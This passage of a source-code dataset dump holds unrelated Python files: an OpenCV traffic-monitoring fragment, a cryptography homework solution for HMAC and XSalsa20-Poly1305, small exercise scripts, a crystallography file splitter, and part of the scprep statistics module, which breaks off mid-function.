2] # divide by homogoneous scale\n # box_ground = box_ground[:, :-1].astype ('int').tolist () # convert into index\n # \"\"\"\n\n box_ground = np.matrix (boxes_ground[view])\n \n\n # img_color = cv2.cvtColor (fg, cv2.COLOR_GRAY2BGR)\n\n # get blobs\n blobs = get_contours (fgs[view])\n\n fgs[view] = cv2.cvtColor (fgs[view], cv2.COLOR_GRAY2BGR)\n inverse_img = draw_polylines (fgs[view], box_ground.tolist (), color=(0,255,0), thickness=5)\n cv2.imwrite ('result/fgs-{}.jpg'.format (view), inverse_img)\n\n # get the blobs that within box_ground\n is_found = False\n for b in blobs : \n (x,y, w, h) = cv2.boundingRect (b)\n for cp in box_ground.tolist () : \n if cp[0] >= x and cp[0] <= x+w and cp[1] >= y and cp[1] <= y+h : \n is_found = True\n break\n\n if is_found : \n # then construct line vertical height\n max_cp_y = np.min (box_ground[:, 1]) - 3 # small tradeoff\n box_floor = []\n for cp in box_ground.tolist () : \n cp_h = list (cp)\n cp_h[1] -= abs (y - max_cp_y)\n\n cv2.line (inverse_img, tuple (cp), tuple (cp_h), (0, 255, 0), 5) \n\n box_floor.append (cp_h)\n\n cv2.imwrite ('result/fgs_w_tail-{}.jpg'.format (view), inverse_img)\n\n inverse_img = draw_polylines (inverse_img, box_floor, color=(0,255,0), thickness=5)\n break\n\n\n cv2.imwrite ('result/{}-{}.jpg'.format (view, ctr), inverse_img)\n\n break\n # show image\n cv2.imshow ('default', img_color)\n\n if (cv2.waitKey(1) & 0xFF == ord('q')) :\n break\n\n","repo_name":"adibPr/traffic-monitoring","sub_path":"test/fusion/8_3DBoxTSI.py","file_name":"8_3DBoxTSI.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"17380914785","text":"import json\r\nimport os\r\nimport hashlib\r\nimport sys\r\nimport hmac\r\n#from sys import byteorder\r\nfrom cryptography.hazmat.primitives.poly1305 import Poly1305\r\nfrom nacl import encoding\r\nimport salsa20\r\nimport secrets\r\nfrom nacl.secret import SecretBox\r\nfrom nacl.exceptions import CryptoError\r\n\r\nf = open('example_input.json')\r\ninputs = json.loads(json.dumps(json.load(f)))\r\n#inputs = json.loads(json.dumps(json.load(sys.stdin)))\r\noutputs = {}\r\n\r\ndef xor_bytes(a, b):\r\n assert len(a) == len(b)\r\n return bytes(x ^ y for x, y in zip(a, b))\r\n\r\ndef secretbox(key, nonce, plaintext):\r\n length = len(plaintext) + 32\r\n salsa20_keystream = salsa20.XSalsa20_keystream(length, nonce, key)\r\n poly1305_key = salsa20_keystream[0:32]\r\n #print(\"salsa20_keystream\")\r\n #print(salsa20_keystream.hex())\r\n #print(\"poly key\")\r\n #print(poly1305_key.hex())\r\n #print(len(poly1305_key))\r\n partial_keystream = salsa20_keystream[32:61] #bytes 33 to 61, after the first 32 bytes used fors the poly1305 key\r\n #print(\"partial keystream\")\r\n #print(partial_keystream.hex())\r\n #print(len(partial_keystream))\r\n #print(type(partial_keystream))\r\n #print(type(p4_message.encode(\"ascii\")))\r\n #print(len(p4_message.encode(\"ascii\")))\r\n xor_ciphertext = xor_bytes(partial_keystream, p4_message.encode(\"ascii\"))\r\n poly1305_mac = Poly1305.generate_tag(poly1305_key, xor_ciphertext)\r\n #print(type(poly1305_mac))\r\n secretbox_ciphertext = poly1305_mac + xor_ciphertext\r\n return secretbox_ciphertext\r\n\r\n#Problem 1\r\np1_Key = bytes.fromhex(inputs[\"problem1\"][\"key\"])\r\np1_Message = inputs[\"problem1\"][\"message\"].encode(\"ascii\")\r\nipad = b\"\\x36\" * 64\r\nopad = b\"\\x5c\" * 64\r\n\r\nmasked_inner_key = xor_bytes(p1_Key, ipad)\r\nmaskedInnerKeyandMessageHash = hashlib.sha256(masked_inner_key+p1_Message).digest()\r\nmasked_outer_key = xor_bytes(p1_Key, opad)\r\nhmacKeyMessage = hashlib.sha256(masked_outer_key + maskedInnerKeyandMessageHash).hexdigest()\r\n\r\nhmacdigest = hmac.new(p1_Key, msg=p1_Message, digestmod=hashlib.sha256).digest()\r\n\r\nassert hmac.compare_digest(hmacKeyMessage, hmacdigest.hex())\r\noutputs[\"problem1\"] = hmacdigest.hex()\r\n#print(hmacKeyMessage)\r\n#print(hmacdigest.hex())\r\n\r\n#Problem 2\r\nlength = (int(inputs[\"problem2\"]))\r\nnonce = b\"E\"*24\r\nkey = b\"D\"*32\r\noutputs[\"problem2\"] = salsa20.XSalsa20_keystream(length, nonce, key).hex()\r\n\r\n#Problem 3\r\np3_message = bytes(inputs[\"problem3\"], encoding='utf-8')\r\np3_key = b\"F\" * 32\r\noutputs[\"problem3\"] = Poly1305.generate_tag(p3_key, p3_message).hex()\r\n\r\n#Problem 4\r\np4_message = inputs[\"problem4\"]\r\np4_key = b\"G\" * 32\r\np4_nonce = b\"H\" * 24\r\n\r\noutputs[\"problem4\"] = secretbox(p4_key, p4_nonce, p4_message).hex()\r\n\r\n#verification check\r\nciphertext = SecretBox(p4_key).encrypt(bytes(p4_message, encoding=\"utf-8\"), p4_nonce).hex()\r\nsecretbox_ciphertext = ciphertext[len(p4_nonce)*2:len(ciphertext)] #slice resulting ciphertext to omit the prepended 24-byte \"H\" nonce\r\nassert secretbox_ciphertext == outputs[\"problem4\"]\r\n\r\nprint(json.dumps(outputs, indent=\" \"))","repo_name":"kevinkenzhao/app_crypto","sub_path":"pset5/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35923157413","text":"# Armazenamento dos dados na lista\r\naluno = []\r\nnota = []\r\nprs = []\r\nresume = []\r\nfor c in range(0, 10):\r\n aluno.append(str(input('Aluno: '))) # Elemento 0\r\n nota.append(float(input('Nota: '))) # Elemento 1\r\n prs.append(float(input('Presença: '))) # Elemento 2\r\n list = [(aluno[c]), nota[c], prs[c]] # Agrupamento das listas\r\n resume.append(list)\r\n\r\nprint(\"-=-\"*30)\r\n\r\n\r\n# Função para checar aprovação do aluno\r\ndef aprova(resume):\r\n for a in resume:\r\n if a[1] >= 7 and a[2] >= 75:\r\n print(f'{a[0]} está APROVADO com nota {a[1]} e prensença de {a[2]}% ')\r\n else:\r\n print(f'{a[0]} está REPROVADO com nota {a[1]} e presença de {a[2]}% ')\r\n return aprova\r\n\r\n\r\naprova(resume)\r\n","repo_name":"Gabriel-olimpio/python-algos","sub_path":"quest3.py","file_name":"quest3.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21157790386","text":"'''\n2020 has been a tough year for travelers. Air travel is especially problematic as passengers need to spend long periods in security lines, waiting areas, and crowded cabins where social distancing is difficult to maintain.\nTo minimize the spread of COVID-19, each airline has decided to reorganize all of their flight routes in a linear fashion. The airlines are hoping that by not making any one country a \"hub\", the spread of the virus will be significantly limited.\nAn airline's flights normally service NN countries, running in various directions. Amidst the pandemic, each airline has carefully arranged these NN countries in a sequence with each assigned a number from 11 to NN. Flights are limited to run only between pairs of countries that are adjacent in this sequence, with service in both directions. No other flights are available. That is, flights are available from country ii to country jj if and only if |i - j| = 1∣i−j∣=1.\nTo make things more complicated, some countries have issued their own restrictions on incoming and outgoing travel. These restrictions are indicated by the characters I_{1..N}I \n1..N\n​\t and O_{1..N}O \n1..N\n​\t , each of which is either \"N\" or \"Y\":\nIf I_iI \ni\n​\t = \"N\", then incoming flights to country ii from any other country are disallowed. Otherwise, if I_iI \ni\n​\t = \"Y\", they may be allowed.\nIf O_iO \ni\n​\t = \"N\", then outgoing flights from country ii to any other country are disallowed. Otherwise, if O_iO \ni\n​\t = \"Y\", they may be allowed.\nIf a flight between adjacent countries is not disallowed by either the departure or arrival country's restrictions, then it's allowed.\nAs a consulting data scientist in the airline industry, your job is to determine which trips between the various countries are possible. Let P_{i,j}P \ni,j\n​\t = \"Y\" if it's possible to travel from country ii to country jj via a sequence of 0 or more flights (which may pass through other countries along the way), and P_{i,j}P \ni,j\n​\t = \"N\" otherwise. Note that P_{i,i}P \ni,i\n​\t is always \"Y\". Output this N*NN∗N matrix of characters.\nInput\nInput begins with an integer TT, the number of airlines. For each airline, there are three lines. The first line contains the integer NN. The second line contains the length-NN string I_{1..N}I \n1..N\n​\t . The third line contains the length-NN string O_{1..N}O \n1..N\n​\t .\nOutput\nFor the iith airline, output a line containing \"Case #i:\" followed by NN more lines, the iith of which contains the length-NN string P_{i,1..N}P \ni,1..N\n​\t .\nConstraints\n1 \\le T \\le 1001≤T≤100\n2 \\le N \\le 502≤N≤50\nExplanation of Sample\nIn the first case, there are two countries with no restrictions. Therefore, trips between all pairs of countries are possible.\nIn the second case, there are two countries, and traveling into country 1 is restricted. Since country 2 is the only country adjacent to country 1, the only impossible trip is from country 2 to country 1.\nIn the third case, there are two countries, both of which restrict inbound travel.\nIn the fourth case, one may not enter countries 2 or 3, nor exit country 4.\nSample Input\n5\n2\nYY\nYY\n2\nNY\nYY\n2\nNN\nYY\n5\nYNNYY\nYYYNY\n10\nNYYYNNYYYY\nYYNYYNYYNY\nSample Output\nCase #1: \nYY\nYY\nCase #2: \nYY\nNY\nCase #3: \nYN\nNY\nCase #4: \nYNNNN\nYYNNN\nNNYYN\nNNNYN\nNNNYY\nCase #5: \nYYYNNNNNNN\nNYYNNNNNNN\nNNYNNNNNNN\nNNYYNNNNNN\nNNYYYNNNNN\nNNNNNYNNNN\nNNNNNNYYYN\nNNNNNNYYYN\nNNNNNNNNYN\nNNNNNNNNYY\n'''\n'''\nNYNYY incoming\nYYYNY outgoing\n'''\ndef genMatrix(N):\n matrix = []\n for i in range(N):\n matrix.append(i*'N' + 'Y' + ((N-i)-1)*'N') #kubu formula\n return matrix\n\ntestCase = int(input())\ntt = 0\nwhile(tt tuple[np.ndarray, np.ndarray]:\n num_samples = 100\n x = np.array(\n [[i, i] for i in range(num_samples)],\n dtype=np.float32,\n )\n y = np.array(\n list(range(num_samples)),\n dtype=np.float32,\n ).reshape(-1, 1)\n return x, y\n\n\ndef build_model() -> Sequential:\n model = Sequential()\n model.add(Dense(units=1, input_shape=(2,), name=\"hidden\"))\n model.add(Activation(\"relu\", name=\"relu\"))\n model.add(Dense(units=1, name=\"output\"))\n model.summary()\n return model\n\n\ndef get_gradients(\n x_test: np.ndarray,\n y_test: np.ndarray,\n model: Sequential,\n loss_object: tf.keras.losses.Loss,\n) -> list[tuple[tf.Tensor, tf.Tensor]]:\n with tf.GradientTape() as tape:\n y_pred = model(x_test, training=True)\n loss_value = loss_object(y_test, y_pred)\n grads = tape.gradient(\n loss_value,\n model.trainable_variables,\n )\n grad_var_tuples = [\n (g, w) for (g, w) in zip(grads, model.trainable_variables)\n ]\n return grad_var_tuples\n\n\ndef main() -> None:\n x, y = get_dataset()\n\n model = build_model()\n\n model.compile(\n loss=\"mse\",\n optimizer=Adam(learning_rate=1e-2),\n metrics=[\"mse\"],\n )\n\n tb_callback = TensorBoard(\n log_dir=MODEL_LOG_DIR,\n embeddings_freq=0,\n write_graph=True,\n )\n\n model.fit(\n x=x,\n y=y,\n verbose=1,\n batch_size=1,\n epochs=0,\n callbacks=[tb_callback],\n )\n\n model.layers[0].set_weights(\n [\n np.array([[-0.250], [1.000]]),\n np.array([0.100]),\n ]\n )\n model.layers[2].set_weights(\n [\n np.array([[1.250]]),\n np.array([0.125]),\n ]\n )\n\n # Test\n loss_object = MeanSquaredError()\n\n x_test = np.array([[2, 2]])\n y_test = np.array([[2]])\n\n y_pred = model.predict(x_test)\n print(f\"Pred: {y_pred}\")\n\n gradients = get_gradients(\n x_test,\n y_test,\n model,\n loss_object,\n )\n\n for grads, weight in gradients:\n print(f\"Layer name: {weight.name}\")\n print(f\"Weights:\\n{weight.numpy()}\")\n print(f\"Grads:\\n{grads.numpy()}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"franneck94/UdemyTF","sub_path":"Chapter05_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py","file_name":"gradientsAndGraph.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"63"} +{"seq_id":"28247479057","text":"# Author: Jintao Huang\n# Email: hjt_study@qq.com\n# Date: \n\nfrom typing import List\n\n\nclass Solution:\n def is_ok(self, weights, days, mid):\n n = mid\n d = 1\n for i in range(len(weights)):\n w = weights[i]\n if w > n:\n n = mid\n d += 1\n n -= w\n if d > days:\n return False\n return True\n\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n lo, hi = max(weights), sum(weights)\n while lo < hi:\n mid = lo + (hi - lo) // 2\n if self.is_ok(weights, days, mid):\n hi = mid\n else:\n lo = mid + 1\n return lo\n\n\nweights = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\ndays = 5\nprint(Solution().shipWithinDays(weights, days))\n","repo_name":"Jintao-Huang/leetcode_notebook","sub_path":"python/2 labuladong的算法小抄/5 高频面试系列/3.3 运输货物[1011].py","file_name":"3.3 运输货物[1011].py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31744516723","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os, sys, tarfile \nglobal path\nimport shutil\npath = sys.path[0]\nmaindirname=\"/home/spasyud/cdb/\"\n#print(os.path.getsize('/home/spasyud/cdb/STRUCTURAL_DATABASE.db'))\ndef striplist(lines): \n return([line for line in lines if line.strip()]) \ndef getcifs(maindirname):\n try: \n try:\n ciflist=[]\n for dirpath, dirnames, filenames in os.walk(maindirname):\n for filename in filenames:\n size=os.path.getsize(os.path.join(dirpath, filename))\n \n if int(size)>=400000:\n print(filename, size)\n if (filename.lower()).endswith(\".cif\"): \n ciflist.append(os.path.join(dirpath, filename)) \n except UnicodeEncodeError:\n pass \n# print (\"scan\",ciflist)\n return ciflist\n except OSError:\n pass\n\n \ndef cifsplitter(ciffile):\n fnamefull=ciffile\n fnoe=os.path.splitext(fnamefull)[0]\n fcif=open(fnamefull, 'r')\n fcifread=fcif.read()\n fcif.close()\n if fcifread.find(\"_shelx_res_file\"):\n resfileb=fcifread.find(\"_shelx_res_file\")\n resfileend=fcifread.find(\"_shelx_res_checksum\")\n hklfileb=fcifread.find(\"_shelx_hkl_file\")\n hklend=fcifread.find(\"_shelx_hkl_checksum\")\n # # print \"resfileb=\", resfileb, \"resfileend=\", resfileend, \"hklb=\", hklfileb, \"hklend=\", hklend\n ciffileout=fcifread[:resfileb]\n resfileout=fcifread[resfileb+15:resfileend].replace(\";\",\"\")\n hklfileout=fcifread[hklfileb+15:(int(hklend)-1)].replace(\";\",\"\")\n hkllist=hklfileout.split(\"\\n\")\n hkloutlist=striplist(hkllist)\n hklfileout=\"\\n\".join(hkloutlist) \n cif=open(fnoe+\"_cd.cif\", 'w')\n cif.write(ciffileout)\n res=open(fnoe+\".res\", 'w')\n res.write(resfileout)\n hkl=open(fnoe+'.hkl', 'w')\n hkl.write(hklfileout)\n res.close()\n hkl.close() \n cif.close() \n os.remove(fnamefull)\ndef interact():\n maindirname=\"/home/spasyud/cdb\"\n cifs=getcifs(maindirname)\n for files in cifs:\n cifsplitter(files)\ninteract()","repo_name":"deonis1/linxtl","sub_path":"Modules/codcleaner.py","file_name":"codcleaner.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20177592113","text":"\nimport numpy as np\nfrom scipy import signal\nfrom PIL import Image\n\n\ndef load_image_path(path):\n return np.asarray(Image.open(path))/255.0\n\ndef save(path, img):\n tmp = np.asarray(img*255.0, dtype=np.uint8)\n Image.fromarray(tmp).save(path)\n\ndef remove_noise_image(inp):\n # estimate 'background' color by a median filter\n bg = signal.medfilt2d(inp,11)\n save('images/background_estimation.jpeg', bg)\n\n # compute 'foreground' mask as anything that is significantly darker than\n # the background\n mask = inp < bg - 0.1\n save('images/foreground_mask.jpeg', mask)\n\n # return the input value for all pixels in the mask or pure white otherwise\n return np.where(mask, inp, 1.0)\n\n#load the file\nimage = Image.open('1.jpeg')\n\n#convert image to grayscale\nimage = image.convert('L')\n\n#resize the image\nnew_image = image.resize((832, 536)) \n\n#now carry out the operations on modified image\nnew_image.save('images/modified_image.jpeg')\ninp_destination = 'images/modified_image.jpeg'\nout_destination = 'images/output_image.jpeg'\n\ninput = load_image_path(inp_destination)\noutput = remove_noise_image(input)\n\nsave(out_destination, output)\n","repo_name":"parul7802/Amul_ads_Classification","sub_path":"image_processing/background_removal.py","file_name":"background_removal.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36965040147","text":"import library as lib\r\nimport cv2\r\nimport numpy as np\r\n\r\ncolor = np.array([[[100,0,255]]],dtype = np.uint8)\r\n# print(color)\r\n\r\nlower , upper = lib.getColorBounds(color)\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n _,frame = cap.read()\r\n frame,mask = lib.getMask(frame , lower , upper)\r\n edges , frame = lib.getLines(mask , frame) \r\n \r\n ##Now we begin contours\r\n \r\n cv2.imshow(\"Vdieo\" , frame)\r\n cv2.imshow(\"Line detector\" , edges)\r\n \r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows() \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# cv2.imshow(\"res\",result)\r\n# cv2.waitKey(0)","repo_name":"seifeldin7666-gmail-com/Final-Project","sub_path":"LineDetection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10906528720","text":"# author: Daniel Burkhardt \n# (C) 2018 Krishnaswamy Lab GPLv2\n\nimport numbers\nimport numpy as np\nfrom scipy import stats, sparse\nfrom sklearn import neighbors, metrics\nfrom . import plot, utils\nimport warnings\n\nplt = utils._try_import(\"matplotlib.pyplot\")\n\n\ndef EMD(x, y):\n \"\"\"Earth Mover's Distance between samples\n\n Calculates an approximation of Earth Mover's Distance (also called\n Wasserstein distance) for 2 variables. This can be thought of as the\n distance between two probability distributions. This metric is useful for\n identifying differentially expressed genes between two groups of cells. For\n more information see https://en.wikipedia.org/wiki/Wasserstein_metric.\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (feature 1)\n y : array-like, shape=[n_samples]\n Input data (feature 2)\n\n Returns\n -------\n emd : float\n Earth Mover's Distance between x and y.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> emd = scprep.stats.EMD(data['GENE1'], data['GENE2'])\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n return stats.wasserstein_distance(x, y)\n\n\ndef pairwise_correlation(X, Y):\n \"\"\"Pairwise Pearson correlation between columns of two matrices\n\n From https://stackoverflow.com/a/33651442/3996580\n\n Parameters\n ----------\n X : array-like, shape=[n_samples, m_features]\n Input data\n Y : array-like, shape=[n_samples, p_features]\n Input data\n\n Returns\n -------\n cor : np.ndarray, shape=[m_features, p_features]\n \"\"\"\n # Get number of rows in either X or Y\n N = X.shape[0]\n assert Y.shape[0] == N\n assert len(X.shape) <= 2\n assert len(Y.shape) <= 2\n X = utils.to_array_or_spmatrix(X).reshape(N, -1)\n Y = utils.to_array_or_spmatrix(Y).reshape(N, -1)\n if sparse.issparse(X) and not sparse.issparse(Y):\n Y = sparse.csr_matrix(Y)\n if sparse.issparse(Y) and not sparse.issparse(X):\n X = sparse.csr_matrix(X)\n # Store columnw-wise in X and Y, as they would be used at few places\n X_colsums = utils.matrix_sum(X, axis=0)\n Y_colsums = utils.matrix_sum(Y, axis=0)\n # Basically there are four parts in the formula. We would compute them\n # one-by-one\n N_times_sum_xy = utils.toarray(N * Y.T.dot(X))\n sum_x_times_sum_y = X_colsums * Y_colsums[:, None]\n var_x = N * utils.matrix_sum(utils.matrix_transform(X, np.power, 2),\n axis=0) - (X_colsums**2)\n var_y = N * utils.matrix_sum(utils.matrix_transform(Y, np.power, 2),\n axis=0) - (Y_colsums**2)\n # Finally compute Pearson Correlation Coefficient as 2D array\n cor = ((N_times_sum_xy - sum_x_times_sum_y) /\n np.sqrt(var_x * var_y[:, None]))\n return cor.T\n\n\ndef mutual_information(x, y, bins=8):\n \"\"\"Mutual information score with set number of bins\n\n Helper function for `sklearn.metrics.mutual_info_score` that builds a\n contingency table over a set number of bins.\n Credit: `Warran Weckesser `_.\n\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (feature 1)\n y : array-like, shape=[n_samples]\n Input data (feature 2)\n bins : int or array-like, (default: 8)\n Passed to np.histogram2d to calculate a contingency table.\n\n Returns\n -------\n mi : float\n Mutual information between x and y.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> mi = scprep.stats.mutual_information(data['GENE1'], data['GENE2'])\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n c_xy = np.histogram2d(x, y, bins)[0]\n mi = metrics.mutual_info_score(None, None, contingency=c_xy)\n return mi\n\n\ndef knnDREMI(x, y, k=10, n_bins=20, n_mesh=3, n_jobs=1,\n plot=False, return_drevi=False, **kwargs):\n \"\"\"kNN conditional Density Resampled Estimate of Mutual Information\n\n Calculates k-Nearest Neighbor conditional Density Resampled Estimate of\n Mutual Information as defined in Van Dijk et al, 2018. [1]_\n\n kNN-DREMI is an adaptation of DREMI (Krishnaswamy et al. 2014, [2]_) for\n single cell RNA-sequencing data. DREMI captures the functional relationship\n between two genes across their entire dynamic range. The key change to\n kNN-DREMI is the replacement of the heat diffusion-based kernel-density\n estimator from Botev et al., 2010 [3]_ by a k-nearest neighbor-based\n density estimator (Sricharan et al., 2012 [4]_), which has been shown to be\n an effective method for sparse and high dimensional datasets.\n\n Note that kNN-DREMI, like Mutual Information and DREMI, is not symmetric.\n Here we are estimating I(Y|X).\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (independent feature)\n y : array-like, shape=[n_samples]\n Input data (dependent feature)\n k : int, range=[0:n_samples), optional (default: 10)\n Number of neighbors\n n_bins : int, range=[0:inf), optional (default: 20)\n Number of bins for density resampling\n n_mesh : int, range=[0:inf), optional (default: 3)\n In each bin, density will be calculcated around (mesh ** 2) points\n n_jobs : int, optional (default: 1)\n Number of threads used for kNN calculation\n plot : bool, optional (default: False)\n If True, DREMI create plots of the data like those seen in\n Fig 5C/D of van Dijk et al. 2018. (doi:10.1016/j.cell.2018.05.061).\n return_drevi : bool, optional (default: False)\n If True, return the DREVI normalized density matrix in addition\n to the DREMI score.\n **kwargs : additional arguments for `scprep.stats.plot_knnDREMI`\n\n Returns\n -------\n dremi : float\n kNN condtional Density resampled estimate of mutual information\n drevi : np.ndarray\n DREVI normalized density matrix. Only returned if `return_drevi`\n is True.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> dremi = scprep.stats.knnDREMI(data['GENE1'], data['GENE2'],\n ... plot=True,\n ... filename='dremi.png')\n\n References\n ----------\n .. [1] van Dijk D *et al.* (2018),\n *Recovering Gene Interactions from Single-Cell Data Using Data\n Diffusion*, `Cell `_.\n .. [2] Krishnaswamy S *et al.* (2014),\n *Conditional density-based analysis of T cell signaling in single-cell\n data*, `Science `_.\n .. [3] Botev ZI *et al*. (2010), *Kernel density estimation via diffusion*,\n `The Annals of Statistics `_.\n .. [4] Sricharan K *et al*. (2012), *Estimation of nonlinear functionals of\n densities with confidence*, `IEEE Transactions on Information Theory\n `_.\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n\n if np.count_nonzero(x - x[0]) == 0 or np.count_nonzero(y - y[0]) == 0:\n warnings.warn(\n \"Attempting to calculate kNN-DREMI on a constant array. Returning `0`\",\n UserWarning)\n # constant input: mutual information is numerically zero\n if return_drevi:\n return 0, None\n else:\n return 0\n\n if not isinstance(k, numbers.Integral):\n raise ValueError(\n \"Expected k as an integer. Got {}\".format(type(k)))\n if not isinstance(n_bins, numbers.Integral):\n raise ValueError(\n \"Expected n_bins as an integer. Got {}\".format(type(n_bins)))\n if not isinstance(n_mesh, numbers.Integral):\n raise ValueError(\n \"Expected n_mesh as an integer. Got {}\".format(type(n_mesh)))\n\n # 0. Z-score X and Y\n x = stats.zscore(x)\n y = stats.zscore(y)\n\n # 1. Create bin and mesh points\n x_bins = np.linspace(min(x), max(x), n_bins + 1) # plus 1 for edges\n y_bins = np.linspace(min(y), max(y), n_bins + 1)\n x_mesh = np.linspace(min(x), max(x), ((n_mesh + 1) * n_bins) + 1)\n y_mesh = np.linspace(min(y), max(y), ((n_mesh + 1) * n_bins) + 1)\n\n # calculate the kNN density around the mesh points\n mesh_points = np.vstack([np.tile(x_mesh, len(y_mesh)),\n np.repeat(y_mesh, len(x_mesh))]).T\n\n # Next, we find the nearest points in the data from the mesh\n knn = neighbors.NearestNeighbors(n_neighbors=k, n_jobs=n_jobs).fit(\n np.vstack([x, y]).T) # this is the data\n # get dists of closests points in data to mesh\n dists, _ = knn.kneighbors(mesh_points)\n\n # Get area, density of each point\n area = np.pi * (dists[:, -1] ** 2)\n density = k / area\n\n # get list of all mesh points that are not bin intersections\n mesh_mask = np.logical_or(np.isin(mesh_points[:, 0], x_bins),\n np.isin(mesh_points[:, 1], y_bins))\n # Sum the densities of each point over the bins\n bin_density, _, _ = np.histogram2d(mesh_points[~mesh_mask, 0],\n mesh_points[~mesh_mask, 1],\n bins=[x_bins, y_bins],\n weights=density[~mesh_mask])\n bin_density = bin_density.T\n # sum the whole grid should be 1\n bin_density = bin_density / np.sum(bin_density)\n\n # Calculate conditional entropy\n # NB: not using thresholding here; entr(M) calcs -x*log(x) elementwise\n drevi = bin_density / \\\n np.sum(bin_density, axis=0) # columns sum to 1\n # calc entropy of each column\n cond_entropies = stats.entropy(drevi, base=2)\n\n # Mutual information (not normalized)\n marginal_entropy = stats.entropy(\n np.sum(bin_density, axis=1), base=2) # entropy of Y\n\n # Multiply the entropy of each column by the density of each column\n # Conditional entropy is the entropy in Y that isn't exmplained by X\n cond_sums = np.sum(bin_density, axis=0) # distribution of X\n conditional_entropy = np.sum(cond_entropies * cond_sums)\n mutual_info = marginal_entropy - conditional_entropy\n\n # DREMI\n marginal_entropy_norm = stats.entropy(np.sum(drevi, axis=1),\n base=2)\n cond_sums_norm = np.mean(drevi)\n conditional_entropy_norm = np.sum(cond_entropies * cond_sums_norm)\n\n dremi = marginal_entropy_norm - conditional_entropy_norm\n\n if plot:\n plot_knnDREMI(dremi, mutual_info,\n x, y, n_bins, n_mesh,\n density, bin_density, drevi, **kwargs)\n if return_drevi:\n return dremi, drevi\n else:\n return dremi\n\n\n@utils._with_pkg(pkg=\"matplotlib\", min_version=3)\ndef plot_knnDREMI(dremi, mutual_info, x, y, n_bins, n_mesh,\n density, bin_density, drevi,\n figsize=(12, 3.5), filename=None,\n xlabel=\"Feature 1\", ylabel=\"Feature 2\",\n title_fontsize=18, label_fontsize=16,\n dpi=150):\n \"\"\"Plot results of DREMI\n\n Create plots of the data like those seen in\n Fig 5C/D of van Dijk et al. 2018. [1]_\n Note that this function is not designed to be called manually. Instead\n create plots by running `scprep.stats.knnDREMI` with `plot=True`.\n\n Parameters\n ----------\n figsize : tuple, optional (default: (12, 3.5))\n Matplotlib figure size\n filename : str or `None`, optional (default: None)\n If given, saves the results to a file\n xlabel : str, optional (default: \"Feature 1\")\n The name of the gene shown on the x axis\n ylabel : str, optional (default: \"Feature 2\")\n The name of the gene shown on the y axis\n title_fontsize : int, optional (default: 18)\n Font size for figure titles\n label_fontsize : int, optional (default: 16)\n Font size for axis labels\n dpi : int, optional (default: 150)\n Dots per inch for saved figure\n \"\"\"\n fig, axes = plt.subplots(1, 4, figsize=figsize)\n # Plot raw data\n axes[0].scatter(x, y, c=\"k\", s=4)\n axes[0].set_title(\"Input\\ndata\", fontsize=title_fontsize)\n axes[0].set_xticks([])\n axes[0].set_yticks([])\n axes[0].set_xlabel(xlabel, fontsize=label_fontsize)\n axes[0].set_ylabel(ylabel, fontsize=label_fontsize)\n\n # Plot kNN density\n n = ((n_mesh + 1) * n_bins) + 1\n axes[1].imshow(np.log(density.reshape(n, n)),\n cmap='inferno', origin=\"lower\", aspect=\"auto\")\n for b in np.linspace(0, n, n_bins + 1):\n axes[1].axhline(b - 0.5, c=\"grey\", linewidth=1)\n\n for b in np.linspace(0, n, n_bins + 1):\n axes[1].axvline(b - 0.5, c=\"grey\", linewidth=1)\n\n axes[1].set_xticks([])\n axes[1].set_yticks([])\n axes[1].set_title(\"kNN\\nDensity\", fontsize=title_fontsize)\n axes[1].set_xlabel(xlabel, fontsize=label_fontsize)\n\n # Plot joint probability\n axes[2].imshow(bin_density,\n cmap=\"inferno\", origin=\"lower\", aspect=\"auto\")\n axes[2].set_xticks([])\n axes[2].set_yticks([])\n axes[2].set_title(\"Joint Prob.\\nMI={:.2f}\".format(mutual_info),\n fontsize=title_fontsize)\n axes[2].set_xlabel(xlabel, fontsize=label_fontsize)\n\n # Plot conditional probability\n axes[3].imshow(drevi,\n cmap=\"inferno\", origin=\"lower\", aspect=\"auto\")\n axes[3].set_xticks([])\n axes[3].set_yticks([])\n axes[3].set_title(\"Conditional Prob.\\nDREMI={:.2f}\".format(dremi),\n fontsize=title_fontsize)\n axes[3].set_xlabel(xlabel, fontsize=label_fontsize)\n\n fig.tight_layout()\n if filename is not None:\n 